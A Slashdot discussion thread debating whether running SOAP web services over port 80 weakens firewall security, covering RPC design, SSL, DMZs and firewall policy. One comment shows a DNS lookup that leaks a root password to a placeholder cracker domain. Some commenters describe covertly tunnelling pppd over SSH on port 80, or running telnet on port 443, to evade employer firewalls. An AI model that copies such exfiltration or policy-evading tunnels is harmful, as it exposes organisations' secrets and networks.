Web Services - More Secure or Less? 313
visibleman asks: "I have recently moved onto a project which is based around web services and SOAP and have, therefore, been doing some reading on those subjects. One thing which keeps coming up is that web services are claimed to be more secure than CORBA and RMI because it means drilling less holes through firewalls. If I was a firewall administrator (I am not, I am a developer) I would want to know that if I open up a port (port 80 for instance) I know what kind of requests are coming through it. Since SOAP is essentially a mechanism for sending functional requests over a port specified for web page requests this would make me nervous. My preference would be that requests for web pages go over one port and requests to run services go over another - favouring an IIOP solution. Am I off my trolley or would other Slashdotters have similar fears?"
The tendancy to run everything on port80 (Score:5, Insightful)
The security or insecurity of a service has nothing to do with whether or not the request can be brokered by a webserver. All this really accomplishes is setting up the webserver as a massive single point of failure, and making it harder to audit what services a particular box is running.
When you use the paradigm that each service has an associated port, you can be sure that nobody is running any unknown services merely by blocking ports. When everything is on port 80, the firewall becomes much less useful.
Re:The tendancy to run everything on port80 (Score:5, Informative)
Although SOAP is bound to HTTP, there is no requirement that you use port 80 -- it's just a well-known HTTP port. As long as the people who need to use your service agree to it, you can use port 12345 if you want. If you are really paranoid, you should be running HTTP over something more secure, like a VPN between you and the service requestor, and not the public (great unwashed) internet.
Re:The tendancy to run everything on port80 (Score:4, Informative)
Re:The tendancy to run everything on port80 (Score:2, Interesting)
Soap makes me happy. If we all shut up, just shut up and be proper and diligent, we just *might* be able to put these platform wars behind us. Of course some amoung us will do everything short of homicide to fuck it up, because they have a vested interest in keeping us fighting each other, but maybe some people will get it.
Re:The tendancy to run everything on port80 (Score:2)
Re:The tendancy to run everything on port80 (Score:2)
Re:The tendancy to run everything on port80 (Score:2)
But port 12345 is already being used [sans.org].
Re:The tendancy to run everything on port80 (Score:2)
The *reason* for the tendancy (Score:2)
You don't have to answer difficult questions about how your service is secured, how it might be exploited to reach other resources within the firewall, etc. You ride the coattails of the "harmless" web server traffic.
Re:The *reason* for the tendancy (Score:5, Insightful)
The problem with big companies who give us big bucks to develop web apps is that the firewall/security teams are totally unresponsive to requests from development teams. A lot of firewall teams act as if nothing is ever up for discussion, and 80 and 443 are all that will ever be. System security would be a lot stronger if the security teams worked along with development teams, but instead a ton of security teams have a fortress mentality, for both system security, and their own interactions - locking themselves away from contact. As a result, everything and anything will eventually be pushed thru 80 and 443.
ostiguy
Re:The *reason* for the tendancy (Score:2, Insightful)
If you are developing an application that Company X needs to use and it has to communicate through the firewall, a simple phone call to PA's manager would solve the problem. But the real reason you want to run SOAP on port 80 is because you don't have a legitimate reason for your application to be running inside the corporate firewall. By legitimate, I mean in the minds of management. No, a "harmless" "e-commerce" "web-app" for music/pr0n/gambling/shopping/whatever is not likely to be considered a legitimate reason.
Any admin would much rather have a program using port 12345, because then, if there is an exploit or malevolent user, it can be blocked at the packet level, instead of putting together every response and parsing the entire message using an infinite symbol list and AI that can detect the potential threat in any file sent through the only port on the only address on the only host in the network, if you can call it that anymore.
Re:The *reason* for the tendancy (Score:3, Insightful)
SOAP is being pushed as an alternative to EDI, Corba, etc, etc (this isn't my area, remember, I am the netadmin trying to destroy tcp/ip). This is because firewall/security teams are not interested in working with (their company's) vendors to establish IPSec tunnels, or SSL tunnels for various apps. Instead of quicker binary transfer within a ssl or ipsec tunnel, stuff will be kludged into https, lest the firewall team's sensibilities be offended.
There will be a huge market for near (as near as one can get) wirespeed http proxies soon as a result. Pretty soon some one will build some hack with some beta of
ostiguy
Re:The *reason* for the tendancy (Score:2, Insightful)
Same goes for third-party web-based applications and services. It is VERY difficult to convince an IT group to open new ports - even if they are for established, standardized protocols.
Running on ports other than 80 is frequently a deal-breaker when trying to sell network applications into highly security-conscious environments. Most network admins equate more open ports with less security whether it is justified or not. HTTP is something they know and understand and already have set their network up to suppor - SOAP just makes sense.
Re:The *reason* for the tendancy (Score:2, Insightful)
to do with the people-ware than the software.
Security people win if absolutely nothing happens.
Greater traffic == greater tendency for things to go awry.
Management, if it can be awakened, needs to step
in and restore balance between security and operational concerns.
Re:The *reason* for the tendancy (Score:3, Funny)
oooooooooooooooooooooooooooooo
o __________Notice _________ o
o If you are a cracker or o
o terrorist please use port o
o port 80 as it is secure. o
o Otherwise you may use the o
o non-secure port 2000. o
o Thanks and have a nice day o
oooooooooooooooooooooooooooooo
Re:The *reason* for the tendancy (Score:3, Funny)
Re:The tendancy to run everything on port80 (Score:4, Insightful)
Ah ha! Pronoun trouble!
Unfortunately, you can only be sure that nobody is running any unknown services if they use the paradigm that each service has an associated port. Some fool rigs up a VPN layered over HTTPS or DNS, and what good is your firewall then?
In some ways, SOAP's obvious security problem is better; at least it's clear you're screwed.
Solving this correctly is a very hard problem.
Re:The tendancy to run everything on port80 (Score:5, Informative)
Here's a purposely oversimplified and perhaps harsh explanation:
Simplisting firewall adminstrators don't care what you send over the network, as long as it's on port 80. More sophisticated adminstrators also insist that it's HTTP. Even more sophisticated ones inspect in more detail, such as checking to see if files transferred have viruses in them.
It's only a matter of time before firewall adminstrators notice that SOAP requests are really RPC calls, and block them by default - then we will all be back to having to get specific configuration changes done to let apps work over the firewall. We won't want to do that for the same reasons we don't want to try to convince someone that it's OK to open a port.
I predict that there will therefore be a way developed to wrap SOAP not only in HTTP, but in HTML. The XML SOAP request could sit inside of simple HTML wrapper tags; this would let it go through the likely block-by-default of SOAP traffic.
Re:The tendancy to run everything on port80 (Score:2)
It's not about security, it's about the adminstrative effort of getting a firewall configuration change made in a large organization.
You mean it's all about avoiding security. Security policies are getting in your way, so you're finding a way to quietly violate their spirit while conforming to their letter. That's a great way to completely compromise the security of your company's IT infrastructure. Good job.
Re:The tendancy to run everything on port80 (Score:2)
you're finding a way to quietly violate their spirit while conforming to their letter. That's a great way to completely compromise the security of your company's IT infrastructure. Good job.
I'm just saving my boss the trouble of doing it himself
Re:He's NOT trolling (Score:2)
agreed: he is *SO* *NOT* trolling (my experiences) (Score:2, Insightful)
Its hardly surprising: they've all been sold on the all they need is a firewall. Then when they discover they need a policy for that firewall and for handling requests from their staff, they all choose to do "whatever everyone else does". This means HTTP, SMTP and POP bascially. (I'll refrain from commenting on how "secure" those three are.)
I was once told (at a previous job) I couldn't have CDDB because it was MP3-ish and might be used by music pirates. (In case you don't know, its a service for looking up the titles of songs, not getting the music itself. I explained this to the guy. He said "I know" but its still not happening.)
Actually the other thing that goes on is people outsource their firewall management. Every time you call you wait a week to get the person who knows their account, then they charge $$$ per hour to make a change. I think we found the real cause of my "no-CDDB" problem.
Re:agreed: he is *SO* *NOT* trolling (my experienc (Score:2)
Implementing IP over SOAP (Score:5, Funny)
So true.
It's taken many years to build up the many layers of network security we have. One of the main reason SOAP is so easy to use is that it drills a hole right through all those layers. In other words, SOAP is easy because it encourages you to ignore everything that makes remote applications hard -- like security.
As an example of just how wacky the everything-on-port-80 idea is, and how dangerous, consider this idea I heard from Bruce Schneier: implement IP over SOAP: have a SOAP service listening at two endpoints for IP packets, and forward those packets over SOAP to the other endpoint. Then make one of those endpoints the default gateway for packets into the otherwise-secure network at the other end....
Just ponder that.
Re:Implementing IP over SOAP (Score:2)
gnu httptunnel vs. Mindterm (Re:SSH over HTTP) (Score:2, Informative)
Better yet, unlike Mindbright's applet, httptunnel is free software (GPL). Mindbright's applet does sound like it has some nice bell's and whistles, though. Probably worth paying for if you were going to roll SSS over HTTP out as a solution to a larger group of users. (using ssh over httptunnel works great, but it can be a little confusing to set up the first time.) Otherwise, try httptunnel instead.
BlueCollarTech.com [bluecollartech.com]
You can tunnel anything inside of anything. (Score:3, Informative)
Re:Implementing IP over SOAP (Score:3, Informative)
And you are most likely going to find SOAP engines that perform a lot of error checking and parsing of an XML message behore handing it to you than your average cgi-bin script that gets the POST request.
OF COURSE its more secure!!! ;) (Score:3, Insightful)
Seriously-- allowing ANY sort of RPC through a firewall has some serious risks.
Re:OF COURSE its more secure!!! ;) (Score:3, Insightful)
"If you do this you'll get in trouble!" (Score:2, Interesting)
Which was blocked by the company firewall.
So I go ask the admin why it's blocked. I mean, WTF, blocking random _incoming_ ports I can understand, but outgoing ports? When there's already port 80 and 21 wide open? Not to mention DNS[1].
"We don't open it because it's more secure that way", he said. "But it's not more secure!" "YES it is!" "Why?" ".... BECAUSE!"
"Ok but look I could just make an SSH tunnel on port 80 with pppd and I can bypass all that stuff
He replied: "well if you do that, you'll get in a LOT of trouble, and the company is going to sue you! And I warn you because I have logs of everything!"
Now what's really interesting is that I had been running this particular setup (pppd through ssh on port 80) for a couple months already, and nobody noticed.
[1] You think you've secured everything and that no info can get through your highly secure firewall? But have you thought about the DNS?
$ host the.root.password.is.iluvmom.crackersite.net
Re:The tendancy to run everything on port80 (Score:2)
Re:The tendancy to run everything on port80 (Score:2)
The same principle, in reverse, is why phil zimmerman (and others) advocates email encryption. The more common encryption is, the less strong the protocol needs to be to achieve relative security. It takes more work to filter thorough a million 46 bit ciphertexts than 1 128 bit. Technically this isn't true, but practically it is.
It is easier to spot a smoking gun if there are only two people in the room than if you are in a stadium full of people.
From a security standpoint (Score:5, Insightful)
I don't think it matters which you use. Allowing people to make functional requests to programs inside your firewall is just as much of a security risk either way. I actually think [omnifarious.org] the function call model is an evil, misleading, broken way of thinking about messages over networks, but like several other practices, people seem bound and determined that this is the way to do things. If you must do this evil thing, it probably doesn't matter (from a security standpoint) how you do it.
The only thing you really gain by not going through port 80 is that the attacker theoretically won't be able to break into your web server software by breaking into your RPC software, but I wouldn't count on that being the case. Besides, either way, they've gotten onto your box, does it really matter how?
Holes in firewalls aren't intrinsically bad things. It's what they lead to that's the problem.
Re:From a security standpoint (Score:3, Interesting)
That is hardly reason for calling it evil.
To call it misleading you would need to provide an argument for why the function call paradigm makes sense when both program components are on the local machine but not when they are distributed. Why should that make a difference? Why should I care where the other end of my transaction be located?
It seems your arguments have more to do with current implementations than any morality inherent in the function call paradigm. I notice that your own alternative is written in C++, which uses the function call paradigm rather than the obviously more efficient, correct, and aesthetically pleasing message passing paradigm.
Re:From a security standpoint (Score:3, Interesting)
I also complain a lot about latency, and I should complain about the lack of a shared address space, which leads to even more latency. That's the biggest issue. The function call model encourages you to ignore unavoidable latency in network messages. It's a fine model for things within the same process, but latency makes it misleading and evil for network messages.
Because, when it's located far away, you have several issues to contend with. First, a function call normally has a latency in the nanosecond range. A network message over the Internet normally has a latency in the millisecond range. Even LAN messages have a latency in the 100s of microsecond range. That's at least 4-5 orders of magnitude (base 10) difference. That's gigantically huge. Yet, it sits there in your program looking like an innocent function call that you'd normally expect to extract an overhead of a few nanseconds.
The other problem is that you don't have very much control over the state of the other program, especially if someone else wrote it. You're essentially introducing close state dependencies between programs that are largely unrelated, and several milliseconds apart. There is nothing _inherent_ about the function call model that forces you to introduce these dependencies, but everything that everybody knows about programming causes you to make certain assumptions about function calls that just aren't true for network messages, especially between largely unrelated programs.
RPC is evil because it hides those essential differences from you.
Re:From a security standpoint (Score:2, Informative)
If I move my program from a flash device to an old MFM drive the drive latency would increase substantially but I don't think that would be reason for calling all synchronous disk I/O broken, evil, and misleading.
Re:From a security standpoint (Score:3, Insightful)
"The other problem is that you don't have very much control over the state of the other program, especially if someone else wrote it."
And with SOAP and XML, you have total control over the remote program? Having "loosely coupled" "general" SOAP messages won't solve incorrect implementations of the remote service.
Re:From a security standpoint (Score:2)
I don't like SOAP either. When I talked about XML in my 'paper', I meant XML documents that aren't designed to encapsulate a function call, but merely carry information.
Re:From a security standpoint (Score:2)
XML documents that aren't designed to encapsulate a function call, but merely carry information.
in SOAP, XML is used to encapsulate function call ids and arguments - it's just data
Re:From a security standpoint (Score:3, Insightful)
Does a call that results in a bunch of SOAP formatted XML being put on the wire look like a function call or not? Does that function call have arguments that mirror the data stuck on the wire or not? If the answer is yes, then SOAP is designed to encapsulate a function call, and is evil.
Re:From a security standpoint (Score:2)
Re:From a security standpoint (Score:2, Interesting)
On the other hand, however, those who use SOAP calls correctly will reap the benefits SOAP has to offer.
An example:
I work for a mortgage company. We had an online rate search engine (till the market went sour anyway). One of our clients ran a few XML queries to our engine (they were located in California, we are in Chicago). Here are the two most important queries.
1. The Loan Search: they would ask a few questions, and then do a Loan Search with one XML query and cache the results.
2. Apply for a loan: they would acquire all information related to applying for a loan, and then send one XML query at the end containing all that information.
Had SOAP and WebServices been available at the time to use in place of custom built XML handling methods (not to even mention production ready XML libraries) our jobs would have been a lot easier.
Had we used SOAP to handle every request (including sending every individual piece of information seperately, or sending an XML document back and forth for every step of the loan application process) our application would have been a hideous failure. Instead, it worked just fine. The biggest problems were my XML parsing techniques were lackluster (this was the first work with XML I had done so it was a little slow) and the market just wasn't there for online mortgaging (to this day, only about half a percent of people who get mortgages actually buy their mortgages entirely online).
SOAP has it's uses, but like any good technology, people can abuse it. As always, time will seperate the good programmers from the bad programmers. Therefore, my conclusion is that SOAP is not inherently evil, rather a lot of crappy programmers are!
Bryan
Re:From a security standpoint (Score:2)
You can't make blanket statements like that. If I am writing an ecommerce app that interfaces with a FedEx web service to get prices for shipping to various destinations for certain services at a certain weight, and I make a call every time a customer wants to know how much shipping would cost, I can get that aspect of the system up and running in less than half the time it would take to develop the in-house data structures, load them, and continue to load them daily (or maybe several times a day, depending on how often the data changes). Yes, I know that last sentence was a run-on, but you get the point. If time-to-market is a high priority (and it should be), then frequent small calls to internet web services could be the answer to a lot of problems.
Re:From a security standpoint (Score:2)
How fortunate that I don't know anyone who does.
Just because there's a performance difference between RPC and LPC doesn't mean that we HAVE to have a different interface for the two. In fact, it's downright stupid to deny yourself the simplicity of function-like RPC calling when it's what the situation calls for.
If a program in question has other needs, then do something else.
You are making a mountain out of a molehill. Show me a program that has the problems you are so worried about. I don't see one. I see programmers using RPC and other methods correctly for the situation.
For a change.
Re:From a security standpoint (Score:2)
I don't know of any programs outside of a proprietary environment that do that. I know of some older research grade programs that do that. I haven't investigated GNOME carefully.
I think that the simplicity is as false as the simplicity of starting up a new thread for every connection when you have to talk to 5000 people at once.
Re:From a security standpoint (Score:2)
You seem to want programs to prevent you from using them wrongly. Can't happen. Mathematically provable for sufficiently precise definitions of "wrong". If you insist on living in that world, expect to pay the usual price for a disconnection from reality, whereas the rest of will continue to have tools that allow us to do dumb things like open 15000 GUI windows, but somehow, we manage to avoid it, without people like you holding our hands.
Except on porn sites & typo sites.
Re:From a security standpoint (Score:2)
Umm, I've seen plenty of programs that have a threading model just as I described. If you listened to people 2-3 years ago, that idea was all the rage.
I don't want things that prevent you from doing stupid stuff. I just want things that don't encourage you to.
Re:RPC evil (latency & failure potential) (Score:2)
while (response = network_event_handler(request) == NULL)
{
wait();
if (timeout())
{
exception("Time to find out who's running Gnutella");
}
}
Re:From a security standpoint (Score:2)
Re:From a security standpoint (Score:2)
SSL isn't an RPC protocol. It's fine to use to hide your data. :-)
Re:From a security standpoint (Score:2)
Oops, I didn't answer your question before. You don't WANT to use SSL because it's expensive.
Well, SSL/TLS, or something like it is the only solution that's really any better than plain text XML. If you think something more obscure is better, you're just fooling yourself. Though you can use something other than HTTPS (which assumes you will be making HTTP requests over SSL/TLS) you might want to design your own protocol and encapsulate it in SSL/TLS instead.
The advantage to doing your own protocol would be that you could have different session setup and teardown semantics than HTTP. HTTP tends to assume that you'll fetch a web page (or a few pages in HTTP/1.1) then disconnect. You might to avoid the setup and teardown overhead because that's the most expensive part of an SSL/TLS session, so designing your own protocol that kept the connection around longer might be an idea.
Overestimating Firewalls. (Score:5, Insightful)
Re:Overestimating Firewalls. (Score:2)
"Harmless http?" (Score:2)
Hmmm.... Not only can XLM-RPC and SOAP also run on port 80, but that HTTP traffic can be mighty harmfull... Thinking of Nimda, Code Red, and CRII.... The problem is that any "protocol" is fundamentally used to exchange instructions and these instructions can be used for all sorts of stuff.... So filter based on services, but please keep the services in your DMZ
Basically, this means--
filter based on IP address and port number. only allow those things to pass through the firewall that you absolutely need (possible exception of outgoing TCP connections, at your discression) and keep it all inventoried.
Re:Overestimating Firewalls. (Score:2, Informative)
Errr.. no. Every competent network administrator distrusts the inside as much as the outside (except for the DMZ).
Re:Overestimating Firewalls. (Score:2)
This is even more true if the institution to be "protected" is a school. It's as necessary to protect the world outside from your own evil students than it is to protect your network from the world outside...
Re:Overestimating Firewalls. (Score:2)
So I just use citrix to connect to my house via port 443. I can use all the apps (icq, etc) on my home machine no problem.
Re:Overestimating Firewalls. (Score:2)
Exactly. And if the bank you work at allows https traffic, it's even more fun: as https is normally encrypted, the firewall cannot even make sure that the traffic passing over port 443 is indeed https. When I worked at a bank, I had telnet servers running on port 443 of a couple of machines outside, and could happily log in to them from work...
SSL (Score:2)
The only way to stop it is to block SSL / HTTPS. Ah, that's a fantastic way to increase security
Firewalling & administration (Score:3, Insightful)
Forcing requests to utilize web services is an easier security model. Singular port monitoring is required and ddos, proper request structure, overflows and the like are handled by the web server, thus abstracted from your application layer and upgradable with less affect on your development. Also its assumed you are using a professional level web server (Apache, Iplanet, NES, or even IIS), meaning a greater user base resulting in problems getting found quicker and fixed faster.
Separate Ports for Separate Functions (Score:5, Insightful)
Separate but equal is what I say.
My problem is usually the range of ports... (Score:2)
I've worked with stuff that required a range of ports (like thousands of them), which is what makes your IP people freak. Far more common than one would think.
SOAP (Score:5, Interesting)
SOAP is transport independant. That's one of its (theoretical) virtues. You can implement SOAP over SMTP, HTTP, whatever.
Practically, it does seem fair to say that HTTP is what an awful lot of SOAP tools are going to be expecting, and given that SOAP is still quite bleeding edge, I wouldn't want to try using another transport protocol unless I could afford time and skill to do a lot of fixing up.
However, HTTP doesn't have to run on port 80. Furthermore, most SOAP implementations will be (well, claim to be) happy on HTTPS too, so that's an easy way to do encryption.
As for the 'web page vs functional' thing, well that's not so simple. A request for a page produced by a CGI script is a functional request coming from strangers over the web. SOAP need not be different.
At the moment, if I want to make an XML version of my content available to folks, I might tell them to use HTTP GET with a URL that invokes a CGI program that returns some XML.
In the future, I might want to make the same XML available via the getXML method my Website class, and then SOAP enable my Website class.
The differences isn't that great.
Re:SOAP (Score:2)
Why? Ask anyone who writes tools that piggyback off of Ebay if they wish Ebay supplied XML representation of auction data. They will pee themselves, then scream out loud with joy. XML provides a way to exchange data that is human and machine readable. It also responds well to compression, due to redundancy.
SOAP security (Score:2, Interesting)
Possibly the most secure precaution is using SSL for the requests. You can require a client certificate to access the service and your site certificate will reassure your partners that they have connected to the correct server. In addition, you can build in custom username/password fields into the app, or have each message PGP signed.
Another option is to move your application to a different IP address and use the firewall to restrict access to it. This method is good if your partners are known ahead of time.
Hope this helps.
Why do you care? (Score:2)
We've all seen that access to port 80 can cause problems with incorectly configured IIS machines anyway.
Basically as a person responsible for security and firewall configuration you don't just enable access on a port just because someone asks for it - you check out what is going to be used and make a decision AND warnings to those involved.
In theory ... (Score:5, Informative)
You can use any port you choose. A bit "security through obscurity" this one, but no harm there>
You don't really need a full web server. All you're going to get is an HTTP request with a SOAP envelope thingy inside. If it doesn't match the WSDL (or whatever) schema thingy you've published, then just ignore it. You only need give the information to people who are going to be legitimately calling your service. Of course you're still vulnerable to normal DoS, but then isn't everyone.
It is quite possible to digitally sign SOAP requests. Just ignore anything not signed/not signed by a recognized customer.
If you are only exepcting SOAP requests from a few other servers, then consider client-side SSL. Since only a few servers will be calling you, then you'll only need a few client certs.
... well ... you get what you ask for. Signatures on SOAP requests aren't (easily) supported by everything yet - but then SOAP implementations differ (eg MS SOAP has no types, IBM SOAP does). This isn't a major issue as it's pretty easy to roll your own request - it's only XML after all.
Like everything, it's as secure as you make it. If you expose "FuckMyOS" as a SOAP method and publish it through UDDI or something then
PS I have no opinion on Vladinator's website.
Re:In theory ... (Score:2)
CGI programmers have had to be trained to code safely, not doing stuff like:
system "$unchecked_input";
SOAP programmers have to trained similarly. GIve 'em some rope, but make sure they don't hang you with it!
better to separate your ports (Score:3, Insightful)
I could, for instance, run my setup on a single box; and then, when traffic went up and the service got popular, replace the box with a Linux firewall to an intranet. The functions could then be divided among several machines on that intranet, and having the firewall box route different ports to their dedicated machines would be a trivial task.
Hell, you could even have redundant machines for critical operations, and if a failure occurred you need only change the routing on the firewall box to get things back up.
More Security Means Knowing What is Going On (Score:2, Informative)
However, there is a flip side to this. I have been in the position of trying to convince large companies to change their firewall configurations. It would be easier to make lead in to gold than to get a large company to allow communications through a new port on their firewall.
This basically means that putting everything through port 80 serves two purposes. It give people the perception of security, and it lets the project actually happen. It is the case that not having to change your network configuration is a powerful marketing tool, but it doesn't make anything more secure. All of these issues are addressed in just about every networking book out there.
Isn't this just an idea for a portal? (Score:3, Interesting)
Also by doing portals in this way, you can force users to authenticate an HTTPS session before accessing the portal site, and the services behind the portal. Of course, how you do authentication can be anything from login/pass to securid or X.509 certificates. Once the users authenticate themselves, then accessing the applications "through port 80" is more secure.
However, setting up multiple DMZs is the way to go. In my example above, where the webserver accesses the services behind the portal, you'd set up those applications in their own DMZ (seperate from the webserver DMZ). Access to this DMZ wouldn't be allowed directly from the outside (restricted by FW), which again would require a compromise of the web server. The other advantage is, if an attacker were to compromise the application *somehow* without a webserver compromise, then this would restrict them to only boxes in this second DMZ and therefore would not compromise the webserver ALSO. Setting up a DMZ correctly means a lot. You can set up a DMZ to accept incoming connections but not to allow anything outbound (except for state traffic). This would prevent an attacker, who has compromised services in the DMZ, from attacking anything else from that point into the rest of your network.
Re:Isn't this just an idea for a portal? (Score:2)
That's all very well, but the inspection performed by the FW-1 HTTP Security Server is quite expensive in performance terms (effectively it turns FW-1 from a stateful packet filter into a proxy).
Not only that, but historically, there have been plenty of problems with the Security Servers to the extent that I wouldn't be happy deploying it on a production, high traffic network (and certainly not without extensive validation).
To be fair, I haven't worked with FW-1 recently and haven't looked at NG (aka v5) at all, so things may well have gotten better.
--
Re:Isn't this just an idea for a portal? (Score:2)
And you're right, the HTTP security service is resource intensive, but that's why you get a few boxes in a sandwich and the load is lessened.
It all has to do with costs on whether you want to implement such a solution.
Valid question. (Score:2)
Now, this does NOT mean that web services are bad, simply that web services have to be written with the understanding that they ARE more open then normal simple RPC calls. Greater use of this design means greater risk in general, since now access to functions that may be suseptable to buffer overflows, denial or service attacks, etc, are basically sitting out there in the open. I've never heard of a denial of service attack targeted at an RPC mechanism, but with little or NO modification, this type of attack could be deployed 'out of the box'.
New security measures will have to be created in order to thwart this greater risk that will now be exposed.
Building analogy (Score:3, Insightful)
Let's say you have a security system hooked up to the front door, the windows, loading dock doors etc. Normally pretty much anyone is allowed to walk through the front door. You do hope nobody manages to climb in through a window, and you have strictly controlled access via the loading dock.
Now if your reception is poorly designed your only hope is that nobody who walks through the front door hacks off the head of your receptionist and proceeds to go walkabout through the building screwing with things. If your reception is well designed this will be hard to do.
You could even have it so that there's some hazard to those right there in reception but breaking out of reception is as hard as breaking in any other way. But you don't just assume it's secure because it's nicely decorated or (in this case) because so many people walk through receptions it *must* be secure.
It's just a security model. If you alter the constraints and facilities of the environment, then you've also changed the range of threats to that environment. And you tailor the prophylactic security, intrusion detection and response to the potential threats and damage of compromise.
Overall, if you want to have any security, you have to think about security. However the hell you set up your systems.
A positive note.. (Score:4, Interesting)
Now of course, this does apply only to SOAP over HTTP, and possibly not SMTP/POP3, Raw socket, MSMQ, etc..etc..
Cryptogram (Score:2)
SOAP requests *can* be filtered (Score:4, Informative)
I agree there is still a major lack of support for this type of filtering, and even the standard leaves something to be desired in this respect, but the SOAP designers definitely did think that this was a big enough problem to provide facilities for future closing of these holes.
It's a bit of a pain to administer, but it definitely *can* be done.
Non issue (Score:2)
Layer 7 firewalling (Score:2)
Yes, another port would be simpler to secure. Without that, firewall administrators will simply go higher in the stack and look at layer 7. In other words, the firewall will have to pick out the URL and apply rules to that. Of course, this also implies the firewall is tracking connections, etc. It can no longer be just a dumb packet filter, but no serious firewall is.
In the end, the lack of a port as a service differentiator isn't a big deal. What is important is that you have something wich differentiates the service. A URL can do that, it just costs a little more CPU.
Firewalls will have to become heuristic (Score:4, Insightful)
I wonder if anyone is working on this?
More appropriate question? (Score:2, Interesting)
Having done sys admin work, it's much easier and less work to go through port 80. That's one less port to keep track of and allows me to build expertise on securing HTTP. Learning to secure a lot of different ports isn't hard though time consuming. Teaching it to new staff and making sure they understand all of it isn't. That's one reason for the adoption of SOAP and other XML/HTTP protocols.
From a developer perspective, would you rather build in IPSec to your IIOP, CORBA application, or setup HTTPS and go through a well tested system? Rolling your own security on top of IIOP and CORBA isn't a trivial task. You could build your own encryption wrapper for IIOP or CORBA, but you would have to handle all the key storage, key management, encryp/decrypt, secure sessions, and authentication to create robust, reliable security.
If your application really needs greater than 128bit SSL, then going through a web server on port 80 doesn't do anything 4 U. To my knowledge RMI can make HTTP connections via java.rmi.server.RMISocketFactory. There are existing Java libs to handle both SSL and key management, so going with port 80 is really a administration choice.
I asked MS the same question at PDC 2000 (Score:3, Informative)
Their response?
Developers are tired of being hampered by netadmins, trying to open up unsecure ports just so that DCOM will work. Basically, SOAP is a way to do it where you don't have to open up esoteric and undocumented ports and protocols...
As far as security goes... it's up to the implementors. SOAP does have one advantage over some other forms of RPC, in that it has a few built in forms of authentication and is explicit as opposed to implicit. That means you can't just randomly activate bits of code just because you can log onto a server.
Another advantage of SOAP is that a decent XML coder can write his own parser for the protocol, so you don't have to use the vendor's, and you can customize your parser to only pass safe requests.
Of course, some of the MS people indicated that they felt I should use the MS parser at this point. I haven't seen anything bad with it, but I wouldn't have any qualms about writing my own if the business needs dictated it...
SOAP is designed to combat security (Score:5, Informative)
SOAP is designed with security in mind. Security circumvention.
Re:SOAP is designed to combat security (Score:2, Insightful)
I think that is this article's most insightful comment so far. cf also the comment above where Bruce Schneier points this out.
Steven Deering and the IETF (Score:2, Insightful)
Bruce Schneier on SOAP (Score:4, Interesting)
<a href="http://www.counterpane.com/crypto-gram-0006
You should try running an ASP. (Score:5, Informative)
We need to fire up a java applet on the client machine that maintains a session with the server. We also need to allow chat.
I can't begin to tell you how many million sof dollars we've lost as a company because of large corporations that refuse to adjust their firewall settings to accomodate web applications.
Some of them don't want
If we're only allowed traffic on port 80, which is the case when dealing with 90% of corporate environments, your choice is either a) get the services running over port 80 or b) give up on maintaining your business.
web services security as an emerging market (Score:3, Insightful)
To date, there have been a large number of tools dedicated to the creation and deployment of web services, but relatively little thought has been given to relationship management between services (a subset of which is security). Only a handful of companies (e.g., the deftly-named Grand Central [grandcentral.com] and Flamenco [flamenconetworks.com]) have started to broach this issue.
I think we can expect to see a large amount of activity in the area of what it takes to connect web services in the real world (i.e., with sensitive data, in business-critical operations, etc.) in the near future. One certainly would not one's web services to be abused [langa.com]/cracked [wired.com] as easily as Microsoft's Passport "technology". It will be interesting to see how this new market evolves.
Don't forget the reality of the customer! (Score:2, Insightful)
This is true for both consumers and business customers.
So while you might want to run a service or application on another port, you might be locked into port 80.
Just something to keep in mind.
Beside, you shouldn't rely on the obscure ports for you security. You should build security into your application from the start. And you should NEVER trust any data that comes from "outside" your applications.
Cheers!
Why do we even need ports in the first place? (Score:3, Insightful)
I would say that drilling open a bunch of ports on a firewall is probably safer than opening port 80 and nothing else and running all services through this port. Why do you suppose we have ports in the first place? If everything is supposed to run on just one port, than we should have just an IP address and no ports at all! But we do have ports, 64K of them.
In my opinion, every "server" program running on a computer should have its own dedicated ports which it listens on and performs operations through. For secure operation, you decide which services you need and enable only those services. Since all ports not used by these services are, well, not used, then you should block those ports in your firewall.
Want more security? Most non-computer people simply don't understand the concept of good computer maintainence. I keep telling people that just like any machine, computers need to be well maintained or their operation degrades over time. (And that means that security vulnerabilities become more likely as time goes by without proper maintainence.) This includes software and hardware maintainence. Once you have a well functional system working, you can search for big security vulnerabilities, like unnecessary programs or whatever. Once those are gone, you look for smaller things, like software configuration that might allow an intruder to get increased priveledges. Once those are gone, you can go deeper, by getting some h4x0r programs and torture testing your system (being careful not to mess up other peoples' systems in the process). Once you can't get into your own system, you can go deeper yet by examining and auditing the source code of programs you're running (if the source is available to you). I'm sure there are about 30 other steps in between these, but these four are the big tick-marks I can think of right now. Oh well.
"Web RPCs Considered Harmful" (Score:2, Informative)
Summary (and using more recent terminology): Web services that expose more new and unique code are more likely to expose bugs. RPCs, SOAP, and CGIs all encourage developers to write more exposed code by making that style easier to do.
One better alternative is to be more data-driven (some would say "functional", as in "functional programming"), so that you only expose data (via a standard server which would typically be more mature, heavily reviewed code).
Alas, that's an entirely different way of thinking that most people are not used to, since it flies in the face of "normal procedural or OO programming" that happens on the desktop. Some examples, though, are Linda Systems (TupleSpaces), REST [conveyor.com] (the traditional WWW architecture), and even P2P to a large extent.
debate summary (Score:2)
I will now summarize this entire article into two opposing viewpoints:
I tend to agree with the second argument, but until we have powerful stateful protocol filters for all protocols that could go through port 80 or wherever, there's no real difference between opening 50 separate holes or one big one. Even then, bad stuff can get in and out over https, etc. So SOAP doesn't really make things much worse, it just points out security issues that we've been ignoring all along.
The Real Reason ... (Score:3, Insightful)
Hence SOAP. You piggyback your ActiveX control onto another service (HTTP) that uses a single port. Smart admins will use something other than port 80; we know how many of *those* there are.
There is also the problem that firewall admins tend to take their job seriously -- they know that if anything nasty gets into the network, they'll get blamed for it. They tend to be *very* conservitave. Web admins don't -- most of them think that the worst that can happen if they get hacked is that they'll get pitchers of nekkid wimmen on the corporate homepage. They don't care. *Much* easier to deal with web admins than firewall admins. Lotsa places will even let you have your own web server if you promise to be nice.
As to what it can lead to, check out RFC 3093, Firewall Enhancement Protocol (FEP) [isi.edu]
Firewalls are lame anyway (Score:2, Insightful)
There are so many ways around most firewalls (modems, wireless networks, unscrupulous visitors, virii on removable media and whotnot) that the firewall is really just the "front door."
End-to-end security -- defense in depth -- is the only way to be sure. Each machine has to be "strong enough" -- just like most office desks and doors are equipped with locks, though most of us don't use 'em.
Clearly we live in a world where most desktops are _completely_ insecure, so firewalls aren't completely worthless. But perhaps SOAP and the like will have some benefit through clueing in some of the clueless that there's more to security than throwing up a firewall.
